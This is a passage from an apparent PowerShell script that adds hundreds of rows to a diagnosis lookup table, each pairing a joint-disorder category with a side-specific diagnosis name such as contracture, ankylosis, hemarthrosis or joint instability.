capsular ligament of knee","Other spontaneous disruption of capsular ligament of unspecified knee") + $null = $DiagnosisList.Rows.Add("Other internal derangements of knee","Other internal derangements of right knee") + $null = $DiagnosisList.Rows.Add("Other internal derangements of knee","Other internal derangements of left knee") + $null = $DiagnosisList.Rows.Add("Other internal derangements of knee","Other internal derangements of unspecified knee") + $null = $DiagnosisList.Rows.Add("Unspecified internal derangement of knee","Unspecified internal derangement of unspecified knee") + $null = $DiagnosisList.Rows.Add("Unspecified internal derangement of knee","Unspecified internal derangement of right knee") + $null = $DiagnosisList.Rows.Add("Unspecified internal derangement of knee","Unspecified internal derangement of left knee") + $null = $DiagnosisList.Rows.Add("Loose body in joint","Loose body in unspecified joint") + $null = $DiagnosisList.Rows.Add("Loose body in shoulder","Loose body in right shoulder") + $null = $DiagnosisList.Rows.Add("Loose body in shoulder","Loose body in left shoulder") + $null = $DiagnosisList.Rows.Add("Loose body in shoulder","Loose body in unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Loose body in elbow","Loose body in right elbow") + $null = $DiagnosisList.Rows.Add("Loose body in elbow","Loose body in left elbow") + $null = $DiagnosisList.Rows.Add("Loose body in elbow","Loose body in unspecified elbow") + $null = $DiagnosisList.Rows.Add("Loose body in wrist","Loose body in right wrist") + $null = $DiagnosisList.Rows.Add("Loose body in wrist","Loose body in left wrist") + $null = $DiagnosisList.Rows.Add("Loose body in wrist","Loose body in unspecified wrist") + $null = $DiagnosisList.Rows.Add("Loose body in finger joints","Loose body in right finger joint(s)") + $null = $DiagnosisList.Rows.Add("Loose body in finger joints","Loose body in left finger joint(s)") + $null = $DiagnosisList.Rows.Add("Loose body in finger joints","Loose body in unspecified finger joint(s)") + $null = $DiagnosisList.Rows.Add("Loose body in hip","Loose body in right hip") + $null = $DiagnosisList.Rows.Add("Loose body in hip","Loose body in left hip") + $null = $DiagnosisList.Rows.Add("Loose body in hip","Loose body in unspecified hip") + $null = $DiagnosisList.Rows.Add("Loose body in ankle and toe joints","Loose body in right ankle") + $null = $DiagnosisList.Rows.Add("Loose body in ankle and toe joints","Loose body in left ankle") + $null = $DiagnosisList.Rows.Add("Loose body in ankle and toe joints","Loose body in unspecified ankle") + $null = $DiagnosisList.Rows.Add("Loose body in ankle and toe joints","Loose body in right toe joint(s)") + $null = $DiagnosisList.Rows.Add("Loose body in ankle and toe joints","Loose body in left toe joint(s)") + $null = $DiagnosisList.Rows.Add("Loose body in ankle and toe joints","Loose body in unspecified toe joints") + $null = $DiagnosisList.Rows.Add("Loose body, other site","Loose body, other site") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders","Other articular cartilage disorders, unspecified site") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, shoulder","Other articular cartilage disorders, right shoulder") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, shoulder","Other articular cartilage disorders, left shoulder") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, shoulder","Other articular cartilage disorders, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, elbow","Other articular cartilage disorders, right elbow") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, elbow","Other articular cartilage disorders, left elbow") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, elbow","Other articular cartilage disorders, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, wrist","Other articular cartilage disorders, right wrist") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, wrist","Other articular cartilage disorders, left wrist") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, wrist","Other articular cartilage disorders, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, hand","Other articular cartilage disorders, right hand") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, hand","Other articular cartilage disorders, left hand") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, hand","Other articular cartilage disorders, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, hip","Other articular cartilage disorders, right hip") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, hip","Other articular cartilage disorders, left hip") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, hip","Other articular cartilage disorders, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, ankle and foot","Other articular cartilage disorders, right ankle") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, ankle and foot","Other articular cartilage disorders, left ankle") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, ankle and foot","Other articular cartilage disorders, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, ankle and foot","Other articular cartilage disorders, right foot") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, ankle and foot","Other articular cartilage disorders, left foot") + $null = $DiagnosisList.Rows.Add("Other articular cartilage disorders, ankle and foot","Other articular cartilage disorders, unspecified foot") + $null = $DiagnosisList.Rows.Add("Disorder of ligament","Disorder of ligament, unspecified site") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, shoulder","Disorder of ligament, right shoulder") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, shoulder","Disorder of ligament, left shoulder") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, shoulder","Disorder of ligament, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, elbow","Disorder of ligament, right elbow") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, elbow","Disorder of ligament, left elbow") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, elbow","Disorder of ligament, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, wrist","Disorder of ligament, right wrist") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, wrist","Disorder of ligament, left wrist") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, wrist","Disorder of ligament, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, hand","Disorder of ligament, right hand") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, hand","Disorder of ligament, left hand") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, hand","Disorder of ligament, unspecified hand") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, hip","Disorder of ligament, right hip") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, hip","Disorder of ligament, left hip") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, hip","Disorder of ligament, unspecified hip") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, ankle and foot","Disorder of ligament, right ankle") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, ankle and foot","Disorder of ligament, left ankle") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, ankle and foot","Disorder of ligament, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, ankle and foot","Disorder of ligament, right foot") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, ankle and foot","Disorder of ligament, left foot") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, ankle and foot","Disorder of ligament, unspecified foot") + $null = $DiagnosisList.Rows.Add("Disorder of ligament, vertebrae","Disorder of ligament, vertebrae") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of joint, not elsewhere classified","Pathological dislocation of unspecified joint, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of shoulder, not elsewhere classified","Pathological dislocation of right shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of shoulder, not elsewhere classified","Pathological dislocation of left shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of shoulder, not elsewhere classified","Pathological dislocation of unspecified shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of elbow, not elsewhere classified","Pathological dislocation of right elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of elbow, not elsewhere classified","Pathological dislocation of left elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of elbow, not elsewhere classified","Pathological dislocation of unspecified elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of wrist, not elsewhere classified","Pathological dislocation of right wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of wrist, not elsewhere classified","Pathological dislocation of left wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of wrist, not elsewhere classified","Pathological dislocation of unspecified wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of hand, not elsewhere classified","Pathological dislocation of right hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of hand, not elsewhere classified","Pathological dislocation of left hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of hand, not elsewhere classified","Pathological dislocation of unspecified hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of hip, not elsewhere classified","Pathological dislocation of right hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of hip, not elsewhere classified","Pathological dislocation of left hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of hip, not elsewhere classified","Pathological dislocation of unspecified hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of knee, not elsewhere classified","Pathological dislocation of right knee, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of knee, not elsewhere classified","Pathological dislocation of left knee, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of knee, not elsewhere classified","Pathological dislocation of unspecified knee, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of ankle and foot, not elsewhere classified","Pathological dislocation of right ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of ankle and foot, not elsewhere classified","Pathological dislocation of left ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of ankle and foot, not elsewhere classified","Pathological dislocation of unspecified ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of ankle and foot, not elsewhere classified","Pathological dislocation of right foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of ankle and foot, not elsewhere classified","Pathological dislocation of left foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Pathological dislocation of ankle and foot, not elsewhere classified","Pathological dislocation of unspecified foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation of joint","Recurrent dislocation, unspecified joint") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, shoulder","Recurrent dislocation, right shoulder") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, shoulder","Recurrent dislocation, left shoulder") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, shoulder","Recurrent dislocation, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, elbow","Recurrent dislocation, right elbow") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, elbow","Recurrent dislocation, left elbow") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, elbow","Recurrent dislocation, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, wrist","Recurrent dislocation, right wrist") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, wrist","Recurrent dislocation, left wrist") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, wrist","Recurrent dislocation, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hand and finger(s)","Recurrent dislocation, right hand") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hand and finger(s)","Recurrent dislocation, left hand") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hand and finger(s)","Recurrent dislocation, unspecified hand") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hand and finger(s)","Recurrent dislocation, right finger") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hand and finger(s)","Recurrent dislocation, left finger") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hand and finger(s)","Recurrent dislocation, unspecified finger") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hip","Recurrent dislocation, right hip") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hip","Recurrent dislocation, left hip") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, hip","Recurrent dislocation, unspecified hip") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, knee","Recurrent dislocation, right knee") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, knee","Recurrent dislocation, left knee") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, knee","Recurrent dislocation, unspecified knee") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, right ankle") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, left ankle") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, right foot") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, left foot") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, unspecified foot") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, right toe(s)") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, left toe(s)") + $null = $DiagnosisList.Rows.Add("Recurrent dislocation, ankle, foot and toes","Recurrent dislocation, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Contracture of joint","Contracture, unspecified joint") + $null = $DiagnosisList.Rows.Add("Contracture, shoulder","Contracture, right shoulder") + $null = $DiagnosisList.Rows.Add("Contracture, shoulder","Contracture, left shoulder") + $null = $DiagnosisList.Rows.Add("Contracture, shoulder","Contracture, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Contracture, elbow","Contracture, right elbow") + $null = $DiagnosisList.Rows.Add("Contracture, elbow","Contracture, left elbow") + $null = $DiagnosisList.Rows.Add("Contracture, elbow","Contracture, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Contracture, wrist","Contracture, right wrist") + $null = $DiagnosisList.Rows.Add("Contracture, wrist","Contracture, left wrist") + $null = $DiagnosisList.Rows.Add("Contracture, wrist","Contracture, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Contracture, hand","Contracture, right hand") + $null = $DiagnosisList.Rows.Add("Contracture, hand","Contracture, left hand") + $null = $DiagnosisList.Rows.Add("Contracture, hand","Contracture, unspecified hand") + $null = $DiagnosisList.Rows.Add("Contracture, hip","Contracture, right hip") + $null = $DiagnosisList.Rows.Add("Contracture, hip","Contracture, left hip") + $null = $DiagnosisList.Rows.Add("Contracture, hip","Contracture, unspecified hip") + $null = $DiagnosisList.Rows.Add("Contracture, knee","Contracture, right knee") + $null = $DiagnosisList.Rows.Add("Contracture, knee","Contracture, left knee") + $null = $DiagnosisList.Rows.Add("Contracture, knee","Contracture, unspecified knee") + $null = $DiagnosisList.Rows.Add("Contracture, ankle and foot","Contracture, right ankle") + $null = $DiagnosisList.Rows.Add("Contracture, ankle and foot","Contracture, left ankle") + $null = $DiagnosisList.Rows.Add("Contracture, ankle and foot","Contracture, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Contracture, ankle and foot","Contracture, right foot") + $null = $DiagnosisList.Rows.Add("Contracture, ankle and foot","Contracture, left foot") + $null = $DiagnosisList.Rows.Add("Contracture, ankle and foot","Contracture, unspecified foot") + $null = $DiagnosisList.Rows.Add("Ankylosis of joint","Ankylosis, unspecified joint") + $null = $DiagnosisList.Rows.Add("Ankylosis, shoulder","Ankylosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Ankylosis, shoulder","Ankylosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Ankylosis, shoulder","Ankylosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Ankylosis, elbow","Ankylosis, right elbow") + $null = $DiagnosisList.Rows.Add("Ankylosis, elbow","Ankylosis, left elbow") + $null = $DiagnosisList.Rows.Add("Ankylosis, elbow","Ankylosis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Ankylosis, wrist","Ankylosis, right wrist") + $null = $DiagnosisList.Rows.Add("Ankylosis, wrist","Ankylosis, left wrist") + $null = $DiagnosisList.Rows.Add("Ankylosis, wrist","Ankylosis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Ankylosis, hand","Ankylosis, right hand") + $null = $DiagnosisList.Rows.Add("Ankylosis, hand","Ankylosis, left hand") + $null = $DiagnosisList.Rows.Add("Ankylosis, hand","Ankylosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Ankylosis, hip","Ankylosis, right hip") + $null = $DiagnosisList.Rows.Add("Ankylosis, hip","Ankylosis, left hip") + $null = $DiagnosisList.Rows.Add("Ankylosis, hip","Ankylosis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Ankylosis, knee","Ankylosis, right knee") + $null = $DiagnosisList.Rows.Add("Ankylosis, knee","Ankylosis, left knee") + $null = $DiagnosisList.Rows.Add("Ankylosis, knee","Ankylosis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Ankylosis, ankle and foot","Ankylosis, right ankle") + $null = $DiagnosisList.Rows.Add("Ankylosis, ankle and foot","Ankylosis, left ankle") + $null = $DiagnosisList.Rows.Add("Ankylosis, ankle and foot","Ankylosis, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Ankylosis, ankle and foot","Ankylosis, right foot") + $null = $DiagnosisList.Rows.Add("Ankylosis, ankle and foot","Ankylosis, left foot") + $null = $DiagnosisList.Rows.Add("Ankylosis, ankle and foot","Ankylosis, unspecified foot") + $null = $DiagnosisList.Rows.Add("Protrusio acetabuli","Protrusio acetabuli") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements, not elsewhere classified","Other specific joint derangements of unspecified joint, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of shoulder, not elsewhere classified","Other specific joint derangements of right shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of shoulder, not elsewhere classified","Other specific joint derangements of left shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of shoulder, not elsewhere classified","Other specific joint derangements of unspecified shoulder, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of elbow, not elsewhere classified","Other specific joint derangements of right elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of elbow, not elsewhere classified","Other specific joint derangements of left elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of elbow, not elsewhere classified","Other specific joint derangements of unspecified elbow, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of wrist, not elsewhere classified","Other specific joint derangements of right wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of wrist, not elsewhere classified","Other specific joint derangements of left wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of wrist, not elsewhere classified","Other specific joint derangements of unspecified wrist, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of hand, not elsewhere classified","Other specific joint derangements of right hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of hand, not elsewhere classified","Other specific joint derangements of left hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of hand, not elsewhere classified","Other specific joint derangements of unspecified hand, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of hip, not elsewhere classified","Other specific joint derangements of right hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of hip, not elsewhere classified","Other specific joint derangements of left hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of hip, not elsewhere classified","Other specific joint derangements of unspecified hip, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of ankle and foot, not elsewhere classified","Other specific joint derangements of right ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of ankle and foot, not elsewhere classified","Other specific joint derangements of left ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of ankle and foot, not elsewhere classified","Other specific joint derangements of unspecified ankle, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of ankle and foot, not elsewhere classified","Other specific joint derangements of right foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of ankle and foot, not elsewhere classified","Other specific joint derangements left foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specific joint derangements of ankle and foot, not elsewhere classified","Other specific joint derangements of unspecified foot, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Joint derangement, unspecified","Joint derangement, unspecified") + $null = $DiagnosisList.Rows.Add("Hemarthrosis","Hemarthrosis, unspecified joint") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, shoulder","Hemarthrosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, shoulder","Hemarthrosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, shoulder","Hemarthrosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, elbow","Hemarthrosis, right elbow") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, elbow","Hemarthrosis, left elbow") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, elbow","Hemarthrosis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, wrist","Hemarthrosis, right wrist") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, wrist","Hemarthrosis, left wrist") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, wrist","Hemarthrosis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, hand","Hemarthrosis, right hand") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, hand","Hemarthrosis, left hand") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, hand","Hemarthrosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, hip","Hemarthrosis, right hip") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, hip","Hemarthrosis, left hip") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, hip","Hemarthrosis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, knee","Hemarthrosis, right knee") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, knee","Hemarthrosis, left knee") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, knee","Hemarthrosis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, ankle and foot","Hemarthrosis, right ankle") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, ankle and foot","Hemarthrosis, left ankle") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, ankle and foot","Hemarthrosis, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, ankle and foot","Hemarthrosis, right foot") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, ankle and foot","Hemarthrosis, left foot") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, ankle and foot","Hemarthrosis, unspecified foot") + $null = $DiagnosisList.Rows.Add("Hemarthrosis, other specified site","Hemarthrosis, other specified site") + $null = $DiagnosisList.Rows.Add("Fistula of joint","Fistula, unspecified joint") + $null = $DiagnosisList.Rows.Add("Fistula, shoulder","Fistula, right shoulder") + $null = $DiagnosisList.Rows.Add("Fistula, shoulder","Fistula, left shoulder") + $null = $DiagnosisList.Rows.Add("Fistula, shoulder","Fistula, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Fistula, elbow","Fistula, right elbow") + $null = $DiagnosisList.Rows.Add("Fistula, elbow","Fistula, left elbow") + $null = $DiagnosisList.Rows.Add("Fistula, elbow","Fistula, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Fistula, wrist","Fistula, right wrist") + $null = $DiagnosisList.Rows.Add("Fistula, wrist","Fistula, left wrist") + $null = $DiagnosisList.Rows.Add("Fistula, wrist","Fistula, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Fistula, hand","Fistula, right hand") + $null = $DiagnosisList.Rows.Add("Fistula, hand","Fistula, left hand") + $null = $DiagnosisList.Rows.Add("Fistula, hand","Fistula, unspecified hand") + $null = $DiagnosisList.Rows.Add("Fistula, hip","Fistula, right hip") + $null = $DiagnosisList.Rows.Add("Fistula, hip","Fistula, left hip") + $null = $DiagnosisList.Rows.Add("Fistula, hip","Fistula, unspecified hip") + $null = $DiagnosisList.Rows.Add("Fistula, knee","Fistula, right knee") + $null = $DiagnosisList.Rows.Add("Fistula, knee","Fistula, left knee") + $null = $DiagnosisList.Rows.Add("Fistula, knee","Fistula, unspecified knee") + $null = $DiagnosisList.Rows.Add("Fistula, ankle and foot","Fistula, right ankle") + $null = $DiagnosisList.Rows.Add("Fistula, ankle and foot","Fistula, left ankle") + $null = $DiagnosisList.Rows.Add("Fistula, ankle and foot","Fistula, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Fistula, ankle and foot","Fistula, right foot") + $null = $DiagnosisList.Rows.Add("Fistula, ankle and foot","Fistula, left foot") + $null = $DiagnosisList.Rows.Add("Fistula, ankle and foot","Fistula, unspecified foot") + $null = $DiagnosisList.Rows.Add("Fistula, other specified site","Fistula, other specified site") + $null = $DiagnosisList.Rows.Add("Flail joint","Flail joint, unspecified joint") + $null = $DiagnosisList.Rows.Add("Flail joint, shoulder","Flail joint, right shoulder") + $null = $DiagnosisList.Rows.Add("Flail joint, shoulder","Flail joint, left shoulder") + $null = $DiagnosisList.Rows.Add("Flail joint, shoulder","Flail joint, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Flail joint, elbow","Flail joint, right elbow") + $null = $DiagnosisList.Rows.Add("Flail joint, elbow","Flail joint, left elbow") + $null = $DiagnosisList.Rows.Add("Flail joint, elbow","Flail joint, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Flail joint, wrist","Flail joint, right wrist") + $null = $DiagnosisList.Rows.Add("Flail joint, wrist","Flail joint, left wrist") + $null = $DiagnosisList.Rows.Add("Flail joint, wrist","Flail joint, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Flail joint, hand","Flail joint, right hand") + $null = $DiagnosisList.Rows.Add("Flail joint, hand","Flail joint, left hand") + $null = $DiagnosisList.Rows.Add("Flail joint, hand","Flail joint, unspecified hand") + $null = $DiagnosisList.Rows.Add("Flail joint, hip","Flail joint, right hip") + $null = $DiagnosisList.Rows.Add("Flail joint, hip","Flail joint, left hip") + $null = $DiagnosisList.Rows.Add("Flail joint, hip","Flail joint, unspecified hip") + $null = $DiagnosisList.Rows.Add("Flail joint, knee","Flail joint, right knee") + $null = $DiagnosisList.Rows.Add("Flail joint, knee","Flail joint, left knee") + $null = $DiagnosisList.Rows.Add("Flail joint, knee","Flail joint, unspecified knee") + $null = $DiagnosisList.Rows.Add("Flail joint, ankle and foot","Flail joint, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Flail joint, ankle and foot","Flail joint, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Flail joint, ankle and foot","Flail joint, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Flail joint, other site","Flail joint, other site") + $null = $DiagnosisList.Rows.Add("Other instability of joint","Other instability, unspecified joint") + $null = $DiagnosisList.Rows.Add("Other instability, shoulder","Other instability, right shoulder") + $null = $DiagnosisList.Rows.Add("Other instability, shoulder","Other instability, left shoulder") + $null = $DiagnosisList.Rows.Add("Other instability, shoulder","Other instability, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other instability, elbow","Other instability, right elbow") + $null = $DiagnosisList.Rows.Add("Other instability, elbow","Other instability, left elbow") + $null = $DiagnosisList.Rows.Add("Other instability, elbow","Other instability, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other instability, wrist","Other instability, right wrist") + $null = $DiagnosisList.Rows.Add("Other instability, wrist","Other instability, left wrist") + $null = $DiagnosisList.Rows.Add("Other instability, wrist","Other instability, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other instability, hand","Other instability, right hand") + $null = $DiagnosisList.Rows.Add("Other instability, hand","Other instability, left hand") + $null = $DiagnosisList.Rows.Add("Other instability, hand","Other instability, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other instability, hip","Other instability, right hip") + $null = $DiagnosisList.Rows.Add("Other instability, hip","Other instability, left hip") + $null = $DiagnosisList.Rows.Add("Other instability, hip","Other instability, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other instability, knee","Other instability, right knee") + $null = $DiagnosisList.Rows.Add("Other instability, knee","Other instability, left knee") + $null = $DiagnosisList.Rows.Add("Other instability, knee","Other instability, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other instability, ankle and foot","Other instability, right ankle") + $null = $DiagnosisList.Rows.Add("Other instability, ankle and foot","Other instability, left ankle") + $null = $DiagnosisList.Rows.Add("Other instability, ankle and foot","Other instability, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Other instability, ankle and foot","Other instability, right foot") + $null = $DiagnosisList.Rows.Add("Other instability, ankle and foot","Other instability, left foot") + $null = $DiagnosisList.Rows.Add("Other instability, ankle and foot","Other instability, unspecified foot") + $null = $DiagnosisList.Rows.Add("Effusion of joint","Effusion, unspecified joint") + $null = $DiagnosisList.Rows.Add("Effusion, shoulder","Effusion, right shoulder") + $null = $DiagnosisList.Rows.Add("Effusion, shoulder","Effusion, left shoulder") + $null = $DiagnosisList.Rows.Add("Effusion, shoulder","Effusion, unspecified shoulder") + $null = 